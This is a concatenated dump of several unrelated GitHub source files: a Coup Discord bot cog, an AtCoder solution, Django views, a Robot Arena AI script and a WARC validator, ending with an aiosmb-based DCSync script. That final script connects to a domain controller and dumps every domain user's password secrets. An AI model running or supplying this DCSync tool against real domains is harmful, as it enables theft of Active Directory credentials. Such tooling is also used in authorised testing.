game.action.is_blockable():\n            # action itself cannot be blocked\n            await ctx.send(f\"{game.action.done_by.get_mention()}'s action is not blockable\")\n            return\n        elif not isinstance(game.action, actions.ForeignAid) and \\\n                game.action.done_to is not player:\n            # not foreign aid, so block must be by `done_to` player\n            await ctx.send(f\"Only {game.action.done_to.get_mention()} is allowed to block\")\n            return\n        elif player is player_to_block:\n            # tried to block self\n            await ctx.send(\"You can't block yourself\")\n            return\n\n        # Auto determine the influence if necessary\n        influence = influence.lower()\n        if influence == \"auto-determine\":\n            # automatically determine what influence they are using to block\n            if isinstance(game.action, actions.Assassinate):\n                # blocking assassination with Contessa\n                influence = \"contessa\"\n            elif isinstance(game.action, actions.ForeignAid):\n                # blocking foreign aid with Duke\n                influence = \"duke\"\n            elif isinstance(game.action, actions.LaunchCoup):\n                # blocking coup with Double Contessa\n                influence = \"doublecontessa\"\n            elif isinstance(game.action, actions.Steal):\n                # blocking a steal with either Captain or Ambassador, but didn't specify\n                await ctx.send(\"Please specify whether you are blocking with Captain or Ambassador\")\n                return\n\n        # Make sure the block is possible with the given card\n        if not game.action.can_block_with(influence):\n            await ctx.send(f\"`{influence.capitalize()}` is unable to block {player_to_block.get_mention()}'s action\")\n            return\n\n        # Convert the influence type into the correct Response class\n        if influence == \"contessa\":\n            response = responses.ContessaBlock(player, player_to_block)\n        elif influence == \"captain\":\n            response = responses.CaptainBlock(player, player_to_block)\n        elif influence == \"ambassador\":\n            response = 
responses.AmbassadorBlock(player, player_to_block)\n elif influence == \"duke\":\n response = responses.DukeBlock(player, player_to_block)\n elif influence == \"doublecontessa\":\n response = responses.DoubleContessaBlock(player, player_to_block)\n else:\n await ctx.send(\"\"\"```Please name a valid influence to block with:\n - contessa\n - captain\n - ambassador\n - duke\n - doublecontessa```\"\"\")\n return\n\n # Perform the block by undoing the action\n game.action.undo_action()\n\n # set the game's Response stage to the newly created response\n game.response = response\n await ctx.send(response.attempt_message())\n\n @commands.command(name=\"pass\", help=PASS_HELP)\n @commands.check_any(\n is_stage(CoupGame.CHALLENGE1_STAGE),\n is_stage(CoupGame.RESPONSE_STAGE),\n is_stage(CoupGame.CHALLENGE2_STAGE))\n @game_is_started()\n @is_player()\n @channel_has_game()\n @commands.guild_only()\n async def pass_response(self, ctx):\n '''\n Lets a player pass on responding, allowing the other\n player's Action or Response to go through successfully\n\n Done by action.done_to:\n - during `challenge1` stage, forcing through to `response` stage\n - during the `response` stage after some other player challenged and lost.\n Done by action.done_by:\n - during `challenge2` stage, allowing other player's Response to go through\n '''\n # Make sure `pass` is an option\n game = self.bot.get_game(ctx.channel.id)\n action = game.action\n if (action is None) or (not action.is_blockable()):\n # there was no choice between blocking / challenging and passing\n await ctx.send(\"Nothing to pass on\")\n return\n game_stage = game.get_stage()\n\n # done_to user responding\n if action.done_to is not None and ctx.author.id == action.done_to.get_id():\n # must be `challenge1` or `response` stage\n if game_stage == CoupGame.CHALLENGE1_STAGE or game_stage == CoupGame.RESPONSE_STAGE:\n # Allows the Action to complete unchecked (turn ends)\n game.response = responses.Pass(action.done_to, action.done_by)\n await ctx.send(game.response.attempt_message())\n else:\n return\n\n # done_by user responding to a Block\n elif ctx.author.id == action.done_by.get_id():\n # must be `challenge2` stage\n if game_stage == CoupGame.CHALLENGE2_STAGE:\n # Allows the (Block) Response to go through\n response = game.response\n game.challenge2 = responses.Pass(response.response_to, response.response_by)\n await ctx.send(game.challenge2.attempt_message())\n else:\n return\n\n # done by a general user\n else:\n await ctx.send(\"You are unable to pass\")\n return\n\n # Pass means the game is no longer pending\n game.pending = False\n\n @commands.command(name=\"challenge\", help=CHALLENGE_HELP)\n @exchange_time_up(False)\n @commands.check_any(is_stage(CoupGame.CHALLENGE1_STAGE), is_stage(CoupGame.CHALLENGE2_STAGE))\n @game_is_started()\n @is_player()\n @channel_has_game()\n @commands.guild_only()\n async def challenge_player(self, ctx):\n '''\n Challenges the last user who did an action\n '''\n game = self.bot.get_game(ctx.channel.id)\n player = game.get_player(ctx.author.id)\n game_stage = game.get_stage()\n\n # Check which event is being challenged\n if game_stage == CoupGame.CHALLENGE1_STAGE:\n # challenging the Action\n if game.action.is_influence_power():\n player_to_challenge = game.action.done_by\n if ctx.author.id == player_to_challenge.get_id():\n # trying to challenge themself\n await ctx.send(\"You can't challenge yourself\")\n return\n\n # Create and carry out the challenge (automatically undoes the action)\n challenge = 
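# [Editor's note] The if/elif ladder above that maps an influence name to its
# Response class could equally be a dispatch table; a sketch of that
# alternative design, using the same classes from the `responses` module:
#
#     BLOCK_CLASSES = {
#         "contessa": responses.ContessaBlock,
#         "captain": responses.CaptainBlock,
#         "ambassador": responses.AmbassadorBlock,
#         "duke": responses.DukeBlock,
#         "doublecontessa": responses.DoubleContessaBlock,
#     }
#     block_cls = BLOCK_CLASSES.get(influence)  # None for unknown influences
#     response = block_cls(player, player_to_block) if block_cls else None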
responses.Challenge(player, player_to_challenge)\n                game.action.undo_action()\n                await ctx.send(challenge.attempt_message())\n                if game.action.done_to is not None and ctx.author.id == game.action.done_to.get_id():\n                    # user is responding with Challenge -> store as response\n                    game.response = challenge\n                else:\n                    # general user challenging -> store as challenge1\n                    game.challenge1 = challenge\n                await self.handle_challenge(ctx, game, game.action, challenge)\n            else:\n                await ctx.send(f\"Can't challenge {game.action.done_by.get_mention()}'s action\")\n                return\n\n        elif game_stage == CoupGame.CHALLENGE2_STAGE:\n            # challenging the Response\n            if game.response.is_influence_power():\n                player_to_challenge = game.response.response_by\n                if ctx.author.id == player_to_challenge.get_id():\n                    # trying to challenge themselves\n                    await ctx.send(\"You can't challenge yourself\")\n                    return\n                else:\n                    # create and carry out the Challenge\n                    game.challenge2 = responses.Challenge(player, player_to_challenge)\n                    await ctx.send(game.challenge2.attempt_message())\n                    await self.handle_challenge(ctx, game, game.response, game.challenge2)\n            else:\n                await ctx.send(f\"Can't challenge {game.response.response_by.get_mention()}'s action\")\n                return\n\n    async def handle_challenge(self, ctx, game, action, challenge):\n        '''\n        Handles the given challenge by checking the result\n        ctx: Context to send results to\n        game: CoupGame holding the game\n        action: Action or Response being challenged\n        challenge: Challenge that was issued\n        '''\n        challenged = challenge.response_to\n        challenger = challenge.response_by\n        if action.wins_challenge():\n            # Action was valid (challenged player wins)\n            await ctx.send(f\"{challenged.get_mention()} won the challenge!\")\n            if isinstance(action, actions.Action):\n                # person who made Action won; redo the action\n                action.perform_action()\n            # if isinstance(action, Response): don't do anything because action was already undone\n            challenger.must_kill += 1\n\n            # Automatically swap challenged_player's revealed card\n            await self._handle_swap(ctx.channel, game, challenged, action, revealed=True)\n            action.swapped = True\n        else:\n            # Action was a bluff (challenger wins)\n            await ctx.send(f\"{challenger.get_mention()} won the challenge!\")\n            if isinstance(action, actions.Action):\n                pass\n                # challenger won against person who made Action; undo the action\n                # ACTION HAS ALREADY BEEN UNDONE\n            if isinstance(action, responses.Response):\n                # challenger won against person who made Response; redo action that had been blocked\n                game.action.perform_action()\n\n            challenged.must_kill += 1\n\n    @commands.command(name=\"die\", help=DIE_HELP)\n    @must_kill()\n    @is_player()\n    @game_is_started()\n    @channel_has_game()\n    @commands.guild_only()\n    async def select_death(self, ctx, *card_nums):\n        '''\n        Allows a player to select their card(s) to die\n        card_nums: the 1-indexed number(s) of the card(s) they are\n        choosing to let die\n        '''\n        game = self.bot.get_game(ctx.channel.id)\n        player = game.get_player(ctx.author.id)\n\n        # Figure out which cards to kill\n        try:\n            card_indexes = {int(num) - 1 for num in card_nums}\n            if len(card_indexes) != player.must_kill:\n                # they aren't killing the correct number\n                await ctx.send(f\"Need to kill `{player.must_kill}` cards, try again\")\n                return\n            for i in card_indexes:\n                if not player[i].alive:\n                    # tried to kill a card that wasn't alive\n                    await ctx.send(f\"Card `{i + 1}` is not alive, try again\")\n                    return\n        except Exception:\n            # non-numeric or out-of-range card selection\n            await ctx.send(\"Invalid card selection, try again\")\n            return\n\n        # Create 
and perform the action\n        response = responses.Die(player, *card_indexes)\n        response.perform_action()\n        game.add_death(response)\n        await ctx.send(response.complete_message())\n\n        # Check if the player is eliminated\n        if player.is_eliminated():\n            await self.bot.process_player_remove(ctx.channel, game, player)\n            await ctx.send(f\"{ctx.author.mention} was eliminated\")\n\n\n    ############################## REMOVING PLAYERS FROM GAME ##############################\n\n    @commands.command(name=\"kick\", help=KICK_HELP)\n    @others_in_game(1, \"kick\")   # checks that other player is part of game and not self\n    @is_game_master()\n    @channel_has_game()\n    @commands.guild_only()\n    async def kick_player(self, ctx, user: User):\n        '''\n        Allows the game master to kick a player from the game\n        user: User to kick\n        '''\n        # Possible to kick player if checks are passed\n        game = self.bot.get_game(ctx.channel.id)\n        if game.is_active():\n            player = game.get_player(user.id)\n\n            # Kill their cards\n            cards_killed = []\n            for i in range(game.influences_per_player()):\n                card = player[i]\n                if card.alive:\n                    game.add_to_dead_pile(card.type)\n                    cards_killed.append(card.type.capitalize())\n            if len(cards_killed) > 0:\n                await ctx.send(f\"{user.mention}'s {', '.join(cards_killed)} was killed\")\n\n            await self.bot.process_player_remove(ctx.channel, game, player)\n        else:\n            # game hasn't started yet\n            game.unsign_up_player(user.id)\n            self.bot.set_user_status(user.id, False)\n            await ctx.send(f\"Removed {user.mention} from game\")\n\n    @commands.command(name=\"forfeit\", help=FORFEIT_HELP)\n    @is_player()\n    @channel_has_game()\n    @commands.guild_only()\n    async def forfeit_game(self, ctx):\n        '''\n        Allows a user to forfeit from a game that has already started\n        '''\n        game = self.bot.get_game(ctx.channel.id)\n        if not game.is_active():\n            await ctx.send(f\"Please use `{self.bot.command_prefix}leave` to leave the game\")\n        elif game.player_count() == 1:\n            # Last player is leaving game; delete game\n            self.bot.set_user_status(ctx.author.id, False)\n            self.bot.remove_game(ctx.channel.id)\n            await ctx.send(\"No players remain - game cancelled\")\n        else:\n            player = game.get_player(ctx.author.id)\n            await ctx.send(ctx.author.mention + \" left the game\")\n\n            # Kill their cards\n            cards_killed = []\n            for i in range(game.influences_per_player()):\n                card = player[i]\n                if card.alive:\n                    game.add_to_dead_pile(card.type)\n                    cards_killed.append(card.type.capitalize())\n            if len(cards_killed) > 0:\n                await ctx.send(f\"{ctx.author.mention}'s {', '.join(cards_killed)} was killed\")\n\n            await self.bot.process_player_remove(ctx.channel, game, player)\n\n\n    ################################# HELPER METHODS ###############################\n\n    async def _prompt_response(self, channel, game):\n        '''\n        Helper method that prompts the player for their response to\n        another player's move\n        channel: discord.Channel to send response prompt in\n        game: CoupGame object representing the game being played\n        '''\n        # Find what is being responded to\n        if game.challenge2 is not None:\n            responding_to = game.challenge2\n            if game.response.wins_challenge():\n                player = game.challenge2.response_by    # player who challenged must respond\n            else:\n                player = game.challenge2.response_to    # player who was challenged must respond\n        elif game.response is not None:\n            responding_to = game.response\n            player = responding_to.response_to\n        elif game.challenge1 is not None:\n            responding_to = game.challenge1\n            if game.action.wins_challenge():\n                player = game.challenge1.response_by    # player who challenged must respond\n            else:\n                
player = game.challenge1.response_to    # player who was challenged must respond\n        elif game.action is not None:\n            responding_to = game.action\n            player = responding_to.done_to\n\n        if not (responding_to.is_influence_power() or responding_to.is_blockable()):\n            # Nothing to respond to\n            return\n\n        if player is None:\n            # asking for general responses\n            await channel.send(\n                \"Waiting for general response ...\",\n                embed=responding_to.available_responses(channel.mention))\n        else:\n            # asking the user specifically\n            await channel.send(f\"Waiting for {player.get_mention()}'s response ...\")\n            await player.get_user().send(embed=responding_to.available_responses(channel.mention))\n\n    async def _check_turn_rotation(self, channel, game, player):\n        '''\n        Checks the turn rotation. If the provided player is the current\n        turn player, nothing happens. If the provided player is the\n        next turn player, the game's previous turn must be finished up,\n        and then updated for a new turn.\n        channel: discord.Channel to send any messages to\n        game: CoupGame object holding the game\n        player: Player object holding the player who made a command\n        Return: True if turn rotated, False otherwise\n        '''\n        if game.get_next_turn().get_id() == player.get_id():\n            # player is from the next turn\n            return await self._check_turn_over(channel, game, send_prompt=False)\n        # was not their turn\n        return False\n\n    async def _check_turn_over(self, channel, game, *, advance_if_possible=True, send_prompt=True):\n        '''\n        Checks if the current turn is over for the given game. If the turn\n        is over, it automatically wraps up the turn and advances it\n        channel: discord.Channel where game is being played\n        game: CoupGame representing the game\n        advance_if_possible: bool, representing whether to advance the turn on the\n        sole basis that it is \"possible\"\n        send_prompt: bool, representing whether to send prompts after\n        rotating the turn (defaults to True)\n        Return: True if the turn was completed, and False otherwise\n        '''\n        if game.soft_pending and not advance_if_possible:\n            # game is soft pending and we don't need to force an advance\n            if not game.hard_pending and game.action is not None:\n                await channel.send(f\"Respond, or {game.get_next_turn().get_mention()} is next up\")\n            return False\n        elif game.is_over():\n            # Send the last turn summary\n            await channel.send(embed=game.turn_summary())\n            return False\n        elif game.hard_pending:\n            # Send which specific players have pending moves\n            await channel.send(embed=game.pending_players_embed())\n            return False\n        elif game.turn_can_complete():\n            # Swap cards for any supers used\n            await self._check_super_swaps(channel, game)\n\n            # Send turn summary and advance to next turn\n            await channel.send(embed=game.turn_summary())\n            game.next_turn()\n            if send_prompt:\n                # Prompt user for their action\n                await channel.send(f\"It is now {game.get_turn().get_mention()}'s turn\")\n                await self.bot.prompt_action(channel)\n            return True\n\n    async def _check_game_over(self, channel, game):\n        '''\n        Checks if the given game is over. 
If it is over, sends the\n appropriate message to the game channel\n channel: discord.Channel to send game over message to\n game: CoupGame object representing game to check\n Return: True if the game was over, False otherwise\n '''\n # Check if the game is over\n if game.is_over():\n # game has a winner\n winner = game.get_winner()\n await channel.send(f\"Game over - {winner.get_mention()} was victorious 🎉\")\n self.bot.remove_game(channel.id)\n return True\n else:\n return False\n\n async def _check_super_swaps(self, channel, game):\n '''\n Checks if any automatic swaps need to happen. Only happens for\n cards that are \"supers\" (like Double Contessa)\n channel: Channel to send information to\n game: CoupGame to check swaps for\n '''\n # Check for swapping in the Action\n action = game.action\n if action is not None and action.is_super() and not action.swapped:\n # Action was a super and has not been swapped yet\n await self._handle_swap(channel, game, action.done_by, action, revealed=False)\n\n # Check for swapping in the Response\n response = game.response\n if response is not None and response.is_super() and not response.swapped:\n # Response was a super and has not been swapped yet\n await self._handle_swap(channel, game, response.response_by, response, revealed=False)\n\n async def _handle_swap(self, channel, game, player, action, *, revealed):\n '''\n Handles a card swap for the player in the given game, for the given action. The\n action informs the method which cards need to be swapped\n channel: Channel to send information to\n game: CoupGame for the game being played\n player: Player getting their cards swapped\n action: Action or Response that needs to be swapped for\n revealed: bool, whether the cards were revealed\n '''\n swapped_cards = game.swap_cards(player, action.REQUIRED_CARDS.copy()) # CardSwap object\n if revealed:\n card_text = swapped_cards.in_text()\n else:\n maybe_swapped = []\n for influence_type, num in action.REQUIRED_CARDS.items():\n for _ in range(num):\n maybe_swapped.append(influence_type.capitalize())\n card_text = f\"(maybe) `{'`, `'.join(maybe_swapped)}`\"\n await channel.send(f\"Swapped {player.get_mention()}'s revealed {card_text} for new cards\")\n await player.get_user().send(swapped_cards.summary_text())\n action.swapped = True\n\n\ndef setup(bot):\n bot.add_cog(GameCog(bot))\n","repo_name":"gavinvogt/coup-discord-bot","sub_path":"Coup Bot/cogs/game_cog.py","file_name":"game_cog.py","file_ext":"py","file_size_in_byte":36607,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"34250166122","text":"A, B, C, D, E, F, X = map(int, input().split())\n\nTakahashi = ([B] * A + [0] * C) * X\nAoki = ([E] * D + [0] * F) * X\n\ntotal_t = 0\ntotal_a = 0\nfor i in range(X):\n total_t += Takahashi[i]\n total_a += Aoki[i]\n\nif total_t > total_a:\n print(\"Takahashi\")\nelif total_t < total_a:\n print(\"Aoki\")\nelse:\n print(\"Draw\")\n","repo_name":"hy-sksem/AtCoder","sub_path":"ABC/abc249/a/a.py","file_name":"a.py","file_ext":"py","file_size_in_byte":323,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"37302275019","text":"import subprocess\r\nfrom django.shortcuts import render, redirect\r\nimport requests\r\nimport json\r\nimport re\r\nimport os\r\nimport subprocess\r\n\r\n# Create your views here.\r\nendpoint = 'http://localhost:5000{}'\r\n\r\ndef index(request):\r\n if request.method == 'GET': \r\n url = endpoint.format('/datos') # 
http://localhost:5000/datos\r\n        data = requests.get(url) # query the API\r\n        url = endpoint.format('/procesos') # http://localhost:5000/procesos\r\n        cXml = requests.get(url)\r\n\r\n        url = endpoint.format('/fechas')\r\n        fBytes = requests.get(url)\r\n\r\n        f = ''\r\n        for f in fBytes:\r\n            f = f.decode('utf-8')\r\n\r\n        fechas = []\r\n        while f != '':\r\n            fecha = re.search(r'([0-2][0-9]|3[0-1])(\\/|-)(0[1-9]|1[0-2])\\2(\\d{4})', f).group()\r\n            fechas.append(fecha)\r\n            f = f.replace(fecha, '')\r\n\r\n        context = {\r\n            'data': data.text,\r\n            'cXml': '',\r\n            'fechas': fechas,\r\n        } \r\n\r\n        if request.GET.get('bDatos') == '':\r\n            context['cXml'] = cXml.text\r\n\r\n        return render(request, 'index.html', context)\r\n\r\n\r\ndef carga(request):\r\n    try:\r\n        docs = request.FILES['document']\r\n    except:\r\n        return redirect('index')\r\n    data = docs.read()\r\n    url = endpoint.format('/datos')\r\n    requests.post(url, data)\r\n    return redirect('index')\r\n\r\n\r\ndef enviar(request):\r\n    url = endpoint.format('/procesos')\r\n    requests.post(url)\r\n    return redirect('index')\r\n\r\n\r\ndef reset(request):\r\n    url = endpoint.format('/reset')\r\n    requests.post(url)\r\n    return redirect('index')\r\n\r\n\r\ndef iva(request):\r\n    if request.method == 'GET':\r\n        selector = request.GET.get('selector')\r\n        inferior = request.GET.get('inferior')\r\n        superior = request.GET.get('superior')\r\n        tipo = request.GET.get('tipo')\r\n        url = endpoint.format('/grafica') # http://localhost:5000/grafica\r\n        grafica = requests.get(url, {\r\n            'selector': selector,\r\n            'inferior': inferior,\r\n            'superior': superior,\r\n            'tipo': tipo\r\n        }) # query the API\r\n\r\n        context = json.loads(grafica.text)\r\n\r\n        return render(request, 'graficas.html', context)\r\n\r\n\r\ndef documento(request):\r\n    module_dir = os.path.dirname(__file__) # get current directory\r\n    file_path = os.path.join(module_dir, '../../../DOCUMENTACION/[IPC2]ENSAYO_202000166.pdf')\r\n    subprocess.Popen([file_path], shell=True)\r\n    return redirect('index')\r\n\r\n\r\ndef pdf(request):\r\n    module_dir = os.path.dirname(__file__) # get current directory\r\n    file_path = os.path.join(module_dir, '../../flask/reporte.pdf')\r\n    subprocess.Popen([file_path], shell=True)\r\n    return redirect('index')\r\n\r\n\r\ndef regresar(request):\r\n    return redirect('index')","repo_name":"Gerson7w7/IPC2_Proyecto3_202000166","sub_path":"PROYECTO3/frontend/webapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2816,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} {"seq_id":"15229262135","text":"from __future__ import generators\nimport plus\nimport AI\nfrom AI import vector3\nimport Arenas\nimport Gooey\nimport math\nimport Tactics\n\nclass Frenzy(AI.SuperAI):\n    \"Hammer strategy\"\n    #Similar to Whipper.py, but intended specifically for spin-motor hammers (the only legal one being the geared Beta burst)\n    #Self-rights with the hammer.\n    #Note: only use on hammers driven by spin motors; it is NOT compatible with other weapons.\n    #Use normal bindings, and wire the hammer with an analog control named \"Hammer\"\n\n    name = \"Frenzy\"\n\n    def __init__(self, **args):\n        AI.SuperAI.__init__(self, **args)\n\n        self.zone = \"weapon\"\n\n        self.tactics.append(Tactics.Engage(self))\n\n        self.whipTimer = 0\n        self.whipDir = 1\n        self.whipDirCount = 4\n\n        self.whipFunction = self.WhipBackAndForth\n\n    def Activate(self, active):\n        if active:\n            if AI.SuperAI.debugging:\n                self.debug = Gooey.Plain(\"watch\", 0, 75, 100, 75)\n                tbox = 
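# [Editor's note] The while-loop in index() above peels dates out of the
# response one re.search at a time. re.finditer collects all of them in one
# pass while keeping the backreference intact -- a sketch with made-up input:
import re

DATE_RE = re.compile(r'([0-2][0-9]|3[0-1])(/|-)(0[1-9]|1[0-2])\2(\d{4})')
fechas = [m.group() for m in DATE_RE.finditer("01/02/2021 y 15-03-2022")]
assert fechas == ['01/02/2021', '15-03-2022']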
self.debug.addText(\"line0\", 0, 0, 100, 15)\n tbox.setText(\"Throttle\")\n tbox = self.debug.addText(\"line1\", 0, 15, 100, 15)\n tbox.setText(\"Turning\")\n tbox = self.debug.addText(\"line2\", 0, 30, 100, 15)\n tbox.setText(\"\")\n tbox = self.debug.addText(\"line3\", 0, 45, 100, 15)\n tbox.setText(\"\")\n\n self.RegisterSmartZone(self.zone, 1)\n else:\n # get rid of reference to self\n self.whipFunction = None\n\n return AI.SuperAI.Activate(self, active)\n\n def Tick(self):\n # fire weapon\n targets = []\n\n if self.weapons:\n targets = [x for x in self.sensors.itervalues() if x.contacts > 0 \\\n and not plus.isDefeated(x.robot)]\n\n bReturn = AI.SuperAI.Tick(self)\n\n # call this now so it takes place after other driving commands\n if self.whipFunction: self.whipFunction(len(targets) > 0)\n\n return bReturn\n\n def InvertHandler(self):\n # fire weapon once per second (until we're upright!)\n while 1:\n if self.whipDir > 0:\n self.Input(\"Hammer\", 0, -100)\n else:\n self.Input(\"Hammer\", 0, 100)\n\n self.whipDirCount -= 1\n if self.whipDirCount < 0:\n self.whipDirCount = 4\n self.whipDir = -self.whipDir\n\n self.whipTimer -= 1\n\n for i in range(0, 8):\n yield 0\n\n def WhipBackAndForth(self, bTarget):\n if bTarget: self.whipTimer = 8\n\n if self.whipTimer > 0:\n # Whip back and forth!\n if self.whipDir > 0:\n self.Input(\"Hammer\", 0, -100)\n else:\n self.Input(\"Hammer\", 0, 100)\n self.Throttle(0)\n\n self.whipDirCount -= 1\n if self.whipDirCount < 0:\n self.whipDirCount = 4\n self.whipDir = -self.whipDir\n\n self.whipTimer -= 1\n\n def LostComponent(self, id):\n # if we lose all our weapons, stop using the Engage tactic and switch to Shove\n if id in self.weapons: self.weapons.remove(id)\n\n if not self.weapons:\n tactic = [x for x in self.tactics if x.name == \"Engage\"]\n if len(tactic) > 0:\n self.tactics.remove(tactic[0])\n\n self.tactics.append(Tactics.Shove(self))\n self.tactics.append(Tactics.Charge(self))\n\n return AI.SuperAI.LostComponent(self, id)\n\n def DebugString(self, id, string):\n if self.debug:\n if id == 0: self.debug.get(\"line0\").setText(string)\n elif id == 1: self.debug.get(\"line1\").setText(string)\n elif id == 2: self.debug.get(\"line2\").setText(string)\n elif id == 3: self.debug.get(\"line3\").setText(string)\n\n def SmartZoneEvent(self, direction, id, robot, chassis):\n if id == 1:\n if robot == 0:\n self.Input(\"Hammer\", 0, -100)\n elif robot > 0:\n if direction == 1:\n AI.SuperAI.SmartZoneEvent(self, direction, id, robot, chassis)\n\n return True\n\nAI.register(Frenzy)\n","repo_name":"apanx/RA2_AI","sub_path":"Frenzy.py","file_name":"Frenzy.py","file_ext":"py","file_size_in_byte":4226,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"27977728962","text":"import gzip\nimport tempfile\n\nfrom ipt.validator.basevalidator import BaseValidator, Shell\n\n\nclass WarctoolsWARC(BaseValidator):\n\n \"\"\"Implements WARC file format validator using Internet Archives warctools\n validator.\n\n .. 
seealso:: https://github.com/internetarchive/warctools\n \"\"\"\n\n _supported_mimetypes = {\n 'application/warc': ['0.17', '0.18', '1.0']\n }\n\n def validate(self):\n\n shell = Shell(['warcvalid', self.fileinfo['filename']])\n\n if shell.returncode != 0:\n self.errors(\"Validation failed: returncode %s\" % shell.returncode)\n self.errors(shell.stderr)\n\n self.messages(shell.stdout)\n\n self._check_warc_version()\n\n def _check_warc_version(self):\n warc_fd = gzip.open(self.fileinfo['filename'])\n try:\n # First assume archive is compressed\n line = warc_fd.readline()\n except IOError:\n # Not compressed archive\n warc_fd.close()\n with open(self.fileinfo['filename'], 'r') as warc_fd:\n line = warc_fd.readline()\n except Exception as exception:\n # Compressed but corrupted gzip file\n self.errors(str(exception))\n return\n\n if \"WARC/%s\" % self.fileinfo['format']['version'] in line:\n self.messages(\"OK: WARC version good\")\n else:\n self.errors(\n \"File version check error, version %s \"\n \"not found from warc: %s\" % (self.fileinfo['format']['version'],\n line))\n\n\nclass WarctoolsARC(BaseValidator):\n\n _supported_mimetypes = {\n 'application/x-internet-archive': ['1.0', '1.1']\n }\n\n def validate(self):\n \"\"\"Validate ARC file by converting to WARC using Warctools' arc2warc\n converter.\"\"\"\n\n with tempfile.NamedTemporaryFile(prefix=\"ipt-warctools.\") as warcfile:\n shell = Shell(command=['arc2warc', self.fileinfo['filename']],\n output_file=warcfile)\n\n if shell.returncode != 0:\n self.errors(\"Validation failed: returncode %s\" %\n shell.returncode)\n self.errors(shell.stderr)\n\n self.messages(shell.stdout)\n","repo_name":"atenhunen/dpres-ipt","sub_path":"ipt/validator/warctools.py","file_name":"warctools.py","file_ext":"py","file_size_in_byte":2269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"78"} +{"seq_id":"41131406698","text":"import asyncio\nimport logging\nimport json\n\nimport aiosmb\nfrom aiosmb.commons.smbcredential import SMBCredential\nfrom aiosmb.commons.smbtarget import SMBTarget\nfrom aiosmb.smbconnection import SMBConnection\nfrom aiosmb.commons.authenticator_builder import AuthenticatorBuilder\nfrom aiosmb.dcerpc.v5.transport.smbtransport import SMBTransport\nfrom aiosmb.dcerpc.v5.interfaces.drsuapimgr import SMBDRSUAPI\nfrom aiosmb.dcerpc.v5.interfaces.samrmgr import SMBSAMR\n\n\nasync def dcsync(connection_string, filename = None, target_domain = None, target_users = [], json_out = False):\n\ttarget = SMBTarget.from_connection_string(connection_string)\n\tcredential = SMBCredential.from_connection_string(connection_string)\n\tspneg = AuthenticatorBuilder.to_spnego_cred(credential, target)\n\t\n\tasync with SMBConnection(spneg, target) as connection: \n\t\tawait connection.login()\n\t\t\n\t\tasync with SMBSAMR(connection) as samr:\n\t\t\tlogging.debug('Connecting to SAMR')\n\t\t\ttry:\n\t\t\t\tawait samr.connect()\n\t\t\texcept Exception as e:\n\t\t\t\tlogging.exception('Failed to connect to SAMR')\n\t\t\t\n\t\t\n\t\t\tif target_domain is None:\n\t\t\t\tlogging.debug('No domain defined, fetching it from SAMR')\n\t\t\t\t\n\t\t\t\t\t\t\n\t\t\t\tlogging.debug('Fetching domains...')\n\t\t\t\tasync for domain in samr.list_domains():\n\t\t\t\t\tif target_domain is None: #using the first available\n\t\t\t\t\t\ttarget_domain = domain\n\t\t\t\t\tlogging.debug('Domain available: %s' % domain)\n\t\t\t\t\t\t\n\t\t\tlogging.debug('Using domain: %s' % target_domain)\n\t\t\tasync with SMBDRSUAPI(connection, target_domain) as 
drsuapi:\n\t\t\t\ttry:\n\t\t\t\t\tawait drsuapi.connect()\n\t\t\t\t\tawait drsuapi.open()\n\t\t\t\texcept:\n\t\t\t\t\tlogging.exception('Failed to connect to DRSUAPI!')\n\t\t\t\t\n\t\t\t\t\n\t\t\t\tif len(target_users) > 0:\n\t\t\t\t\tif filename is not None:\n\t\t\t\t\t\twith open(filename, 'w') as f:\n\t\t\t\t\t\t\tfor username in target_users:\n\t\t\t\t\t\t\t\tsecrets = await drsuapi.get_user_secrets(username)\n\t\t\t\t\t\t\t\tif json_out == True:\n\t\t\t\t\t\t\t\t\tf.write(json.dumps(secrets.to_dict()))\n\t\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t\tf.write(str(secrets))\n\t\t\t\t\t\t\t\t\t\n\t\t\t\t\telse:\n\t\t\t\t\t\tfor username in target_users:\n\t\t\t\t\t\t\tsecrets = await drsuapi.get_user_secrets(username)\n\t\t\t\t\t\t\tprint(str(secrets))\n\t\t\t\t\t\t\n\t\t\t\telse:\n\t\t\t\t\tdomain_sid = await samr.get_domain_sid(target_domain)\n\t\t\t\t\tdomain_handle = await samr.open_domain(domain_sid)\n\t\t\t\t\tif filename is not None:\n\t\t\t\t\t\twith open(filename, 'w') as f:\n\t\t\t\t\t\t\tasync for username, user_sid in samr.list_domain_users(domain_handle):\n\t\t\t\t\t\t\t\tsecrets = await drsuapi.get_user_secrets(username)\n\t\t\t\t\t\t\t\tif json_out == True:\n\t\t\t\t\t\t\t\t\tf.write(json.dumps(secrets.to_dict()) + '\\r\\n')\n\t\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t\tf.write(str(secrets))\n\t\t\t\t\t\t\t\t\t\n\t\t\t\t\telse:\n\t\t\t\t\t\tasync for username, user_sid in samr.list_domain_users(domain_handle):\n\t\t\t\t\t\t\tsecrets = await drsuapi.get_user_secrets(username)\n\t\t\t\t\t\t\tprint(str(secrets))\n\n\tprint('Done!')\nif __name__ == '__main__':\n\timport argparse\n\t\n\t\n\t\n\tparser = argparse.ArgumentParser(description='Fetch all domain user credentials via DCSync (DRSUAPI)')\n\tparser.add_argument('-v', '--verbose', action='count', default=0, help='Increase verbosity, can be stacked')\n\tparser.add_argument('connection_string', help='connection string. Identifies the credential to be used and the target')\n\tparser.add_argument('-o', '--out-file', help='file to store the results in')\n\tparser.add_argument('-d', '--domain', default = None, help='Name of the domain to perform DCSync on.')\n\tparser.add_argument('--json', action='store_true', help='File output will be written in JSON format')\n\tparser.add_argument('-u', '--user', action='append', default = [], help='User name to get secrets for. If not used, all users will be polled. 
